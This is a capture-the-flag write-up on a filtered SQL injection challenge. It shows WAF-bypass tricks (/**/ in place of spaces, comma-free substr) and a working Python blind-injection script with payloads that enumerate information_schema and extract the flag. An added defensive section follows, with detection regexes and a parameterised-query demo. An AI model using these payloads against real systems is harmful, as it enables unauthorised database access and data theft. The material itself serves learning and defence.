Testing shows the filter blocks union, spaces, single quotes and commas.
Screenshots (not preserved): normal response; statement executed with echoed output; WAF triggered; database error.
Getting around the space filter is easy, /**/ works; the real obstacle is that commas and union are filtered, so I turned to blind injection. From what I read:
' and ascii(substr((select database()),1,1))=xx %23
With this form a script can brute-force the result easily. Once commas are filtered it can be rewritten as
' and ascii(substr((select database()) from 1 for 1))=xx %23
These should be the two syntaxes of the substring function.
The script:

```python
import requests

url = 'https://b93ee205-6e35-402c-a4c2-e5c8540937d4.chall.ctf.show/index.php'
s = requests.session()
flag = ""
for i in range(1, 45):            # character position inside the result
    for j in range(32, 128):      # printable ASCII values to compare against
        # comma-free substr(... from i for 1), /**/ standing in for spaces
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#" % (str(i), str(j))
        test = s.get(url=url + '?id=0/**/or/**/' + payload).text
        if 'I asked nothing' in test:   # the page text that marks a true condition
            flag += chr(j)
            print(flag)
            break
```
Running it gives the table name: flag.

```python
# The original line queried table_name from information_schema.tables here, which returns
# the table name again rather than its columns; column_name / information_schema.columns
# is what the described result (the column list of table flag) requires.
payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#" % (str(i), str(j))
```
Running it gives the column name in table flag: flag.

```python
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#" % (str(i), str(j))
```
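A defender-side counterpart to the bypass described above and to the script, added here and not part of the original write-up: a small Python normaliser that undoes the /**/ spacing and URL encoding before matching the signatures of this technique (boolean probe with ascii(), comma-free substr ... from ... for, information_schema enumeration, hex literals standing in for quoted strings), run over the write-up's own payloads reassembled as constructed sample values, followed by a string-concatenated lookup next to a parameterised one on an in-memory SQLite table to show why parameter binding, not a keyword blacklist, is the actual fix. The signature names, the items table and the sample values are my own assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote


def normalize(param: str) -> str:
    """Undo the encoding and spacing tricks seen in the write-up before matching."""
    s = unquote(param)                              # %23 -> '#', %20 -> ' ', ...
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)    # /**/ used in place of spaces
    s = re.sub(r"\s+", " ", s)                      # collapse runs of whitespace
    return s.strip().lower()


# Signatures matched against the *normalised* value. The names are my own labels.
PATTERNS = {
    "boolean_probe": re.compile(r"\b(or|and)\b\s+ascii\s*\("),
    "comma_free_substr": re.compile(r"\bsubstr(ing)?\s*\(.*\bfrom\b.*\bfor\b", re.S),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "hex_string_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
    "tautology": re.compile(r"\bor\b\s+(\d+)\s*=\s*\1\b"),
}


def classify(raw_param: str) -> list:
    """Return the signature names that fire for one query-string value."""
    findings = []
    if "/*" in unquote(raw_param):
        findings.append("comment_spacing")          # visible before normalisation only
    norm = normalize(raw_param)
    for name, rx in PATTERNS.items():
        if rx.search(norm):
            findings.append(name)
    return findings


# Constructed sample id= values: the first two are the write-up's payloads reassembled,
# the last two are benign traffic that must not alert.
SAMPLES = [
    "0/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/"
    "information_schema.tables/**/where/**/table_schema=database())from/**/1/**/for/**/1))=102%23",
    "0/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/"
    "information_schema.columns/**/where/**/table_name=0x666C6167)from/**/1/**/for/**/1))=102%23",
    "42",
    "1",
]


def _demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the challenge backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "a"), (2, "b")])
    return conn


def lookup_concat(conn, user_id):
    # Vulnerable: the value becomes SQL text, so 0/**/or/**/1=1 rewrites the WHERE clause.
    return conn.execute(f"SELECT name FROM items WHERE id={user_id}").fetchall()


def lookup_param(conn, user_id):
    # Hardened: bound parameter; the same string is compared as a value and matches no row.
    return conn.execute("SELECT name FROM items WHERE id=?", (user_id,)).fetchall()


def compare_queries(injected: str) -> tuple:
    """Row counts returned by the vulnerable and the hardened lookup for one input."""
    conn = _demo_db()
    return len(lookup_concat(conn, injected)), len(lookup_param(conn, injected))


if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or "clean", "<-", sample[:60])
    print(compare_queries("0/**/or/**/1=1"))   # (2, 0): concatenation leaks every row
```

The normaliser is meant for alerting, not blocking: a keyword filter like the challenge's (union, space, quote, comma) is exactly what the write-up walks around, and every pattern above can be evaded by another rewrite. The last two functions show the actual mitigation; with the value bound as a parameter the probe is compared as an integer literal that never matches, so the true/false oracle the script depends on disappears.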